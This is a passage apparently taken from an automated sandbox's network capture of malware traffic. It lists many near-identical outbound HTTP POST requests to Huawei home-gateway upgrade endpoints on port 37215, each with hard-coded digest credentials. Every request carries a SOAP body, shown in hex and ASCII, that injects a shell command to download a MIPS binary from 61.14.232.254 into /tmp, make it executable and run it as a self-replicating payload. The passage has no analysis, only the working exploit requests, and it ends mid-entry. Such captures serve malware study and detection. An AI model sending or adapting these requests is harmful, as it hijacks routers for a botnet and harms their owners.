                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1689192.168.2.133707441.201.182.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617284060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1690192.168.2.1357612194.160.158.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617325068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1691192.168.2.135666461.147.39.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617326021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1692192.168.2.1355938197.4.238.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617332935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1693192.168.2.1355382197.114.111.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617336035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1694192.168.2.1334294157.87.230.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617362022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1695192.168.2.1353300197.139.199.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617362976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1696192.168.2.133342041.214.151.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617383003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1697192.168.2.1336560197.60.53.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617392063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1698192.168.2.134120472.243.95.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617430925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 